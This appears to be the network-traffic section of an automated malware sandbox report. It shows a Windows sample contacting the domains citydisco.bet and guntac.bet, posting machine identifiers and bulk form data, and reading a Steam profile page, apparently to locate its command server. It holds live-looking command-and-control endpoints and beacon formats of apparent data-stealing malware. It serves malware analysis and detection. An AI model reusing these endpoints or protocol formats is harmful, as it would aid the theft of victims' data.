                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.440260887 CET44349719104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.440326929 CET49719443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.440663099 CET49719443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.440685034 CET44349719104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.441092014 CET44349719104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.441422939 CET49720443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.441458941 CET44349720104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.441520929 CET49720443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.441694021 CET49720443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.441724062 CET44349720104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.442570925 CET49720443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.443073988 CET49721443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.443110943 CET44349721104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.443185091 CET49721443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.443470001 CET49721443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.443485022 CET44349721104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.443866014 CET44349721104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.444189072 CET49722443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.444217920 CET44349722104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.444287062 CET49722443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.444577932 CET49722443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.444590092 CET44349722104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.444961071 CET44349722104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.445306063 CET49723443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.445331097 CET44349723104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.445424080 CET49723443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.445593119 CET49723443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.445621014 CET44349723104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.446161985 CET49723443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.624449968 CET49724443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.624509096 CET44349724104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.625087976 CET49724443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.625612974 CET49724443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.625627041 CET44349724104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.626302958 CET44349724104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.626740932 CET49725443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.626786947 CET44349725104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.627171993 CET49725443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.627681971 CET49725443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.627691984 CET44349725104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.628166914 CET44349725104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.628475904 CET49726443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.628520012 CET44349726104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.628639936 CET49726443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.628787041 CET49726443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.628820896 CET44349726104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.629192114 CET49726443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.629935026 CET49727443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.629961014 CET44349727104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.631413937 CET49727443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.631887913 CET49727443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.631900072 CET44349727104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.632390022 CET44349727104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.634964943 CET49728443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.634979963 CET44349728104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.635106087 CET49728443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.635560989 CET49728443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.635570049 CET44349728104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.636064053 CET44349728104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.636379957 CET49729443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.636403084 CET44349729104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.636496067 CET49729443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.636591911 CET49729443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.636616945 CET44349729104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.636670113 CET49729443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:18.609642982 CET49730443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:18.609699965 CET44349730104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:27.522490978 CET5734453192.168.2.81.1.1.1
                                                                                                                                                                                                                          Mar 13, 2025 14:58:27.569567919 CET53573441.1.1.1192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                                                                                                                                                          • citydisco.bet
                                                                                                                                                                                                                          • steamcommunity.com
                                                                                                                                                                                                                          • guntac.bet
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49682 | 188.114.97.3 | 443 | 7128 | C:\Users\user\Desktop\nvtoaldlrg.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-13 13:58:08 UTC | 263 | OUT | POST /gdJIS HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 73
Host: citydisco.bet
2025-03-13 13:58:08 UTC | 73 | OUT | Data Raw: 75 69 64 3d 37 33 37 30 39 63 65 36 61 33 39 36 64 61 33 33 37 39 36 37 64 34 35 35 61 35 64 35 37 39 34 37 26 63 69 64 3d 61 36 65 33 34 38 33 35 32 39 33 64 61 31 37 38 32 38 30 33 34 63 39 36 32 34 66 34 62 36 34 39
Data Ascii: uid=73709ce6a396da337967d455a5d57947&cid=a6e34835293da17828034c9624f4b649
2025-03-13 13:58:09 UTC | 783 | IN | HTTP/1.1 200 OK
Date: Thu, 13 Mar 2025 13:58:09 GMT
Content-Type: application/octet-stream
Content-Length: 14408
Connection: close
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2L%2FTF6OmirOBn5je3Kr3zYA4kr98L7TF0RA0oUiewnWElXWxou4kzZi6xEa%2BN6sPx3OoW8%2F2E4zOQVAltQviGI8cEgWCEc4hrLZd%2BDFtgl7kUri90SC5Lra%2Bp6dUVYDw"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 91fc0b602fc25961-IAD
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=18435&min_rtt=14594&rtt_var=7551&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2831&recv_bytes=972&delivery_rate=198328&cwnd=243&unsent_bytes=0&cid=740add63977cfd66&ts=1202&x=0"
                                                                                                                                                                                                                          Data Ascii: B%TJX>I,VK;9d*xPo }Pq=G'Lhd3%E]D]:14yfP"V9(Z29eFgk ~QZ9]YK@4[ n5!4i7b[ZZ(e<Y(CjV/h^WAUB@Kma5lX`Z<AtR{|U+f[@
                                                                                                                                                                                                                          2025-03-13 13:58:09 UTC1369INData Raw: b4 21 11 e6 b3 ca 2f 47 34 d2 6c c8 c0 a3 23 6c e0 3b 88 70 5c 72 ae 34 5d 69 3e dd 06 fe 3f 50 64 5e ad d3 0b 15 4b 49 6a f9 a0 a2 e2 91 01 0c 7c 6c 7d ad eb 53 3e a9 32 14 ca 92 aa d3 4e 96 89 d1 32 7a 7a ea ba 26 cb ac 65 10 dc a7 4f b8 f4 b5 27 cf 9e ff 7c ce 98 0f c7 67 88 eb 13 40 ec 5d a4 90 1b 9f b3 3d 03 31 a8 43 6b 4f 13 56 6f 1c 4a d9 2d 8a 11 a8 21 94 82 b9 3a fc 49 49 5f 8b 60 bb ab c8 ec 8f 68 7f b1 d8 27 f8 37 f6 c6 ad 24 82 b6 80 96 aa 3b 92 2f 95 8f 33 f9 de 7e 6b 06 bc 9d f5 39 10 c2 4e b9 ef 61 5d ed 6f 86 1d 1b 5d 80 e7 61 ba 39 9a c7 bc 62 b0 b9 b7 60 ea a2 25 db 5d 16 e0 9e 13 96 0d d1 c7 81 c3 7f 9d 3d 39 ee f7 e4 a5 aa 65 fa e6 55 1b 09 ce e4 24 4d 77 a0 a7 a5 45 6c 63 d0 78 74 e9 8d 0a 36 6d 07 48 5a b6 3d 4e 9b c4 7e ef ba 92 75
                                                                                                                                                                                                                          Data Ascii: !/G4l#l;p\r4]i>?Pd^KIj|l}S>2N2zz&eO'|g@]=1CkOVoJ-!:II_`h'7$;/3~k9Na]o]a9b`%]=9eU$MwElcxt6mHZ=N~u
                                                                                                                                                                                                                          2025-03-13 13:58:09 UTC1369INData Raw: 68 f0 d8 8a 4f 35 8d 8b 62 95 e8 d3 51 03 f2 cb ab d1 f2 b1 cf 9a 25 be 2b 6f a7 b8 6c 4f a9 8b 8e 33 d9 db 8f 74 b0 54 32 56 74 d8 5a 72 ba 02 99 51 10 21 bf 34 3b 14 26 96 3d b0 7c 62 0e 9a 7d 83 0f 6b bb 97 80 7a e0 ca bc 23 b6 c1 cc 93 37 14 93 40 9b 2c 61 89 6f 46 48 89 c3 31 59 0f 63 e0 d3 37 36 f8 91 27 3a 9e d1 f5 a9 93 b6 b7 2f 32 cc 9d 95 07 f0 26 f0 a9 ff a1 d6 6e 94 4f a0 0e e1 68 ab a1 57 66 55 65 65 4a b1 e8 e6 9f 60 dc af 5f b9 c3 dd 4b 52 a5 20 62 36 92 dc 93 da 03 7d ac 0b d6 f1 eb cb 53 ec e1 46 cc 34 52 35 5a bf 3d 43 87 cc 76 e2 93 f4 15 e4 df 70 20 b6 4f 49 d5 6d dc 9a 49 e0 55 3e 6b 7e 0c de 4d db 50 0c ec aa 57 2b 04 65 0c 2c 61 48 39 02 bc 7e 93 16 db 67 19 d5 05 60 fe 5c 6a 19 10 93 34 23 2f e0 61 3c 29 66 a5 24 75 47 52 d5 78 72
                                                                                                                                                                                                                          Data Ascii: hO5bQ%+olO3tT2VtZrQ!4;&=|b}kz#7@,aoFH1Yc76':/2&nOhWfUeeJ`_KR b6}SF4R5Z=Cvp OImIU>k~MPW+e,aH9~g`\j4#/a<)f$uGRxr
                                                                                                                                                                                                                          2025-03-13 13:58:09 UTC1369INData Raw: 75 ad 91 7f 29 32 46 ca b3 2e 81 a2 b2 10 7a 2c d2 ae bf bc 2c 80 62 e2 50 1e 2d a4 de 3e 3d c0 bc b3 c1 2f 06 3f 8f 65 91 b2 4c 37 3c 15 3a 8a a8 3a f0 d0 0e 96 2f e2 a2 34 a9 7c 5d 5c 9e 78 06 a1 19 05 7d a6 32 21 b3 bf b2 48 76 93 c2 7b b2 66 36 08 72 34 31 4e 0c eb b8 69 f0 25 67 c2 7a 76 90 0c 48 26 64 02 ab 05 77 e1 d0 06 21 13 ad ae 49 74 d8 54 d1 58 9c d9 74 a0 d7 8e 8e 9b c5 e2 86 6d 9b 17 51 39 d6 95 c8 2b db b6 7f c5 5d 3f 1c 7f e3 2f 37 0b 05 c1 0d c7 56 c3 4a ee f8 8d 64 41 3b 0c 38 e1 bf 50 bc 64 cb b7 0d a5 78 25 f5 b2 ad 44 1e ce 46 f1 3f 77 4c 47 7b 3c 39 18 fa d4 4e 8c 39 bf 6a 3a 53 fe df ed f0 e9 d5 92 2b d2 84 f9 bc 0f 67 39 91 a4 7b 3b 57 ee 70 c1 68 ac ef e5 17 19 f3 9e 37 8c fb 6e e5 52 cb b0 36 0d 3c bb 01 c8 ff 3d 05 ab 54 93 98
                                                                                                                                                                                                                          Data Ascii: u)2F.z,,bP->=/?eL7<::/4|]\x}2!Hv{f6r41Ni%gzvH&dw!ItTXtmQ9+]?/7VJdA;8Pdx%DF?wLG{<9N9j:S+g9{;Wph7nR6<=T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49683 | 188.114.97.3 | 443 | 7128 | C:\Users\user\Desktop\nvtoaldlrg.exe

Timestamp | Bytes transferred | Direction | Data
2025-03-13 13:58:11 UTC | 278 | OUT | POST /gdJIS HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=g82Kw7030JG54Ml
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 14496
Host: citydisco.bet
2025-03-13 13:58:11 UTC | 14496 | OUT | Data Ascii:
--g82Kw7030JG54Ml
Content-Disposition: form-data; name="uid"

73709ce6a396da337967d455a5d57947
--g82Kw7030JG54Ml
Content-Disposition: form-data; name="pid"

2
--g82Kw7030JG54Ml
Content-Disposition: form-data; name="hwid"

BF865A1D88BBCB8D268E09
2025-03-13 13:58:11 UTC | 811 | IN | HTTP/1.1 200 OK
Date: Thu, 13 Mar 2025 13:58:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SU9zG%2B4hdw2ZFTkhPMzzzck0hBOshx3XTDQMWSK8yKFtLEN0FVzC98bk66x5el2e6Ak%2BjxgEHTmkG8OmJGAfvd6rzVkrbj2g9UAolECmjF7PQQMR4Aa2d60ds%2FNCTNna"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 91fc0b701e652000-IAD
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=18497&min_rtt=15142&rtt_var=7268&sent=12&recv=19&lost=0&retrans=0&sent_bytes=2831&recv_bytes=15432&delivery_rate=191142&cwnd=250&unsent_bytes=0&cid=0903f5e6a871bb68&ts=1025&x=0"
2025-03-13 13:58:11 UTC | 76 | IN | Data Ascii:
46
{"success":{"message":"message success delivery from 74.110.223.148"}}
2025-03-13 13:58:11 UTC | 5 | IN | Data Ascii:
0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49684 | 188.114.97.3 | 443 | 7128 | C:\Users\user\Desktop\nvtoaldlrg.exe

Timestamp | Bytes transferred | Direction | Data
2025-03-13 13:58:13 UTC | 272 | OUT | POST /gdJIS HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=6nR23kDEj
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 15012
Host: citydisco.bet
2025-03-13 13:58:13 UTC | 15012 | OUT | Data Ascii:
--6nR23kDEj
Content-Disposition: form-data; name="uid"

73709ce6a396da337967d455a5d57947
--6nR23kDEj
Content-Disposition: form-data; name="pid"

2
--6nR23kDEj
Content-Disposition: form-data; name="hwid"

BF865A1D88BBCB8D268E09A37DD4DDDD
--6nR2
2025-03-13 13:58:14 UTC | 809 | IN | HTTP/1.1 200 OK
Date: Thu, 13 Mar 2025 13:58:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jj7pXljNcpwses9TgCp4hc2WHNT7xC%2B2KRfqe7JzpFKJIb5DXUzY4ze29yAx5L8Pd%2FfTeMZRkVMOUQpMpqtUacHoy4cmin9vQTm%2BmBGvyqq7uJYfrsBlKyUlDszPQ3R8"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 91fc0b7ecbabd6e5-IAD
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=18511&min_rtt=14932&rtt_var=7411&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2830&recv_bytes=15942&delivery_rate=193880&cwnd=235&unsent_bytes=0&cid=4e3564aefe59ac65&ts=873&x=0"
2025-03-13 13:58:14 UTC | 76 | IN | Data Ascii:
46
{"success":{"message":"message success delivery from 74.110.223.148"}}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49730 | 104.73.234.102 | 443 | 7128 | C:\Users\user\Desktop\nvtoaldlrg.exe

Timestamp | Bytes transferred | Direction | Data
2025-03-13 13:58:21 UTC | 94 | OUT | GET /profiles/76561199822375128 HTTP/1.1
Connection: Keep-Alive
Host: steamcommunity.com
2025-03-13 13:58:21 UTC | 1962 | IN | HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Thu, 13 Mar 2025 13:58:21 GMT
Content-Length: 26244
Connection: close
Set-Cookie: sessionid=cee889fd76b5b4226d768242; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=US%7C83521ba33f152859d9ded61861c1940c; path=/; secure; HttpOnly; SameSite=None
2025-03-13 13:58:21 UTC | 14422 | IN | Data Ascii:
<!DOCTYPE html>
<html class=" responsive DesktopUI" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="viewport" content="width=device-width,initial-scale=1">
<meta name="theme-color" content="#171a21">
2025-03-13 13:58:22 UTC | 11822 | IN | Data Ascii:
yle="display: none;">
<div class="popup_body popup_menu">
<a class="popup_menu_item tight" href="?l=schinese" onclick="ChangeLanguage( 'schinese' ); return false;"> (Simplified Chinese)</a>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49731 | 104.73.234.102 | 443 | 7128 | C:\Users\user\Desktop\nvtoaldlrg.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-13 13:58:23 UTC | 94 | OUT | GET /profiles/76561199822375128 HTTP/1.1
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Host: steamcommunity.com
2025-03-13 13:58:24 UTC | 1962 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                          Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          Date: Thu, 13 Mar 2025 13:58:24 GMT
                                                                                                                                                                                                                          Content-Length: 26244
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Set-Cookie: sessionid=cac8a6ba4568ff49bb7a7ac9; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                          Set-Cookie: steamCountry=US%7C83521ba33f152859d9ded61861c1940c; path=/; secure; HttpOnly; SameSite=None
2025-03-13 13:58:24 UTC | 14422 | IN | Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
2025-03-13 13:58:24 UTC | 11822 | IN | Data Ascii: yle="display: none;"><div class="popup_body popup_menu"><a class="popup_menu_item tight" href="?l=schinese" onclick="ChangeLanguage( 'schinese' ); return false;"> (Simplified Chinese)</a>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 49733 | 104.73.234.102 | 443 | 7128 | C:\Users\user\Desktop\nvtoaldlrg.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-13 13:58:26 UTC | 94 | OUT | GET /profiles/76561199822375128 HTTP/1.1
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Host: steamcommunity.com
2025-03-13 13:58:27 UTC | 1962 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                          Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          Date: Thu, 13 Mar 2025 13:58:26 GMT
                                                                                                                                                                                                                          Content-Length: 35710
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Set-Cookie: sessionid=740c83c77edb84e75be3f9bd; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                          Set-Cookie: steamCountry=US%7C83521ba33f152859d9ded61861c1940c; path=/; secure; HttpOnly; SameSite=None
2025-03-13 13:58:27 UTC | 14422 | IN | Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
2025-03-13 13:58:27 UTC | 16384 | IN | Data Ascii: ctor" data-tooltip-content=".submenu_Community">COMMUNITY</a><div class="submenu_Community" style="display: none;" data-submenuid="Community"><a class="submenuitem" href="https://steamcommunity.com/">Home</a>
2025-03-13 13:58:27 UTC | 3762 | IN | Data Ascii: <div class="playerAvatarAutoSizeInner"><img src="https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg"></div></div><div class="profile_header_badgeinfo"><div class="profile_header_
2025-03-13 13:58:27 UTC | 1142 | IN | Data Ascii: All rights reserved. All trademarks are property of their respective owners in the US and other countries.<br/>Some geospatial data on this website is provided by <a href="https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org" target="_bl


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.8 | 49738 | 188.114.96.3 | 443 | 7128 | C:\Users\user\Desktop\nvtoaldlrg.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-13 13:58:28 UTC | 263 | OUT | POST /bSHsyZD HTTP/1.1
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Content-Length: 111
                                                                                                                                                                                                                          Host: guntac.bet
2025-03-13 13:58:28 UTC | 111 | OUT | Data Ascii: uid=73709ce6a396da337967d455a5d57947&cid=a6e34835293da17828034c9624f4b649&hwid=BF865A1D88BBCB8D268E09A37DD4DDDD
2025-03-13 13:58:29 UTC | 806 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Thu, 13 Mar 2025 13:58:29 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V6FjNRpKX9myqsCVI%2FEK6Ul5nExbvd%2Bc0Apd42auOk6SNYjYk94jqARAstVtdWDJ0d7NOLLw%2B3UfDegyJDlDVm3KxH6s72ooo6SDNjmjy%2BUxw3UfU2aSXT6qHWVn"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 91fc0be08cb3ba2a-SEA
                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
